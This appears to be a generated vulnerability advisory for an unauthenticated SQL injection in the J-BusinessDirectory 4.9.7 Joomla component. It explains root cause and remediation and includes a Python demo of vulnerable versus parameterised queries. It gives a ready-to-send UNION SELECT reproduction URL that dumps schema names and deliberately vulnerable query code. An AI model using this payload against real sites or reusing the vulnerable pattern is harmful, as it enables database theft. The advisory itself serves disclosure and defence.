Joomla! Component J-BusinessDirectory 4.9.7 SQL Injection
Description
Joomla! Component J-BusinessDirectory 4.9.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the type parameter. Attackers can send GET requests to index.php with the option=com_jbusinessdirectory&task=categories.getCategories parameters and inject UNION-based SQL statements in the type parameter to extract database information including schema names and sensitive data.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- Range: =4.9.7
Patches
Vulnerability mechanics
Root cause
"Missing input validation on the `type` parameter allows UNION-based SQL injection."
Attack vector
An unauthenticated attacker sends a GET request to `index.php?option=com_jbusinessdirectory&task=categories.getCategories` with a malicious `type` parameter containing a UNION SELECT payload [ref_id=1]. The injected SQL extracts database schema names from `INFORMATION_SCHEMA.SCHEMATA`. No authentication or special privileges are required.
Affected code
The vulnerability resides in the `categories.getCategories` task of the J-BusinessDirectory component (version 4.9.7). The `type` parameter is passed directly into an SQL query without sanitization, allowing UNION-based injection.
What the fix does
The advisory does not include a patch diff. To remediate, the `type` parameter must be validated (for example, cast to the integer the query expects) or bound as a query parameter before it reaches the SQL text, so that its contents can never alter the query's structure. Without a fix, any unauthenticated visitor can execute arbitrary SQL statements.
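The root cause and the fix, as an added, self-contained example that is not the component's code (J-BusinessDirectory is PHP; this is a Python/SQLite model of the same query shape). The table and column names are assumptions; the payload is the page's reproduction payload rewritten for SQLite, where `sqlite_master` stands in for MySQL's `INFORMATION_SCHEMA.SCHEMATA` and the separator `0x3c62723e` (`<br>`) is written as a string. The `,2` in the payload matters because UNION requires the injected SELECT to return as many columns as the original query, which is two here.

```python
import sqlite3

# Constructed demo schema (assumption, not the real extension schema): a
# two-column category lookup keyed by an integer `type`, plus an unrelated
# table whose name the injected query will leak.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE categories (id INTEGER, name TEXT, type INTEGER);
        CREATE TABLE users (id INTEGER, email TEXT);
        INSERT INTO categories VALUES (1, 'Restaurants', 1), (2, 'Hotels', 1), (3, 'Garages', 2);
        """
    )
    return conn


def get_categories_vulnerable(conn: sqlite3.Connection, type_value: str) -> list:
    # Root cause: the request parameter is interpolated into the SQL text, so
    # a value such as "1 union select ..." becomes part of the statement.
    sql = f"SELECT id, name FROM categories WHERE type = {type_value}"
    return conn.execute(sql).fetchall()


def get_categories_fixed(conn: sqlite3.Connection, type_value) -> list:
    # Fix: the value is bound as a parameter. The driver sends it as data, so
    # the statement always has exactly one WHERE comparison and two columns.
    sql = "SELECT id, name FROM categories WHERE type = ?"
    return conn.execute(sql, (type_value,)).fetchall()


def get_categories_validated(conn: sqlite3.Connection, type_value) -> list:
    # Stricter variant: reject anything that is not an integer before querying.
    # int() raises ValueError on the injection payload, which the caller should
    # turn into a 400 response.
    return get_categories_fixed(conn, int(type_value))


# SQLite rendering of the page's payload: `1 union select (subquery),2-- -`.
# group_concat(name, '<br>') over sqlite_master plays the role of
# GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) over INFORMATION_SCHEMA.SCHEMATA,
# and `-- -` comments out whatever the application appends after the value.
PAYLOAD = "1 union select (SELECT group_concat(name, '<br>') FROM sqlite_master),2-- -"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable": get_categories_vulnerable(conn, PAYLOAD),
        "fixed": get_categories_fixed(conn, PAYLOAD),
        "benign": get_categories_fixed(conn, 1),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

With the vulnerable builder the result set contains an extra row whose first column is the concatenated list of table names, which is exactly what the page's PoC shows for schema names; with the bound parameter the same string is compared as data against an integer column and matches nothing.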
Preconditions
- config: The J-BusinessDirectory component (version 4.9.7) must be installed and enabled on the Joomla site.
- auth: No authentication required; the vulnerable endpoint is publicly accessible.
- network: Attacker must be able to send HTTP GET requests to the Joomla instance.
- input: The `type` GET parameter is user-controlled and unsanitized.
Reproduction
Send a GET request to `http://target/[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a` [ref_id=1]. URL-decoded, the `type` value is `1 union select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2-- -`: the subquery concatenates every schema name with `<br>` (`0x3c62723e`) as separator, the trailing `,2` pads the injected SELECT to the two columns the original query returns, and `-- -` comments out the remainder of the statement. The server responds with a JSON payload containing the database schema names.
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- www.exploit-db.com/exploits/46230 (mitre, exploit)
- www.vulncheck.com/advisories/joomla-component-j-businessdirectory-sql-injection (mitre, third-party-advisory)
- cmsjunkie.com (mitre, product)
- extensions.joomla.org/extensions/extension/directory-a-documentation/directory/j-businessdirectory/ (mitre, product)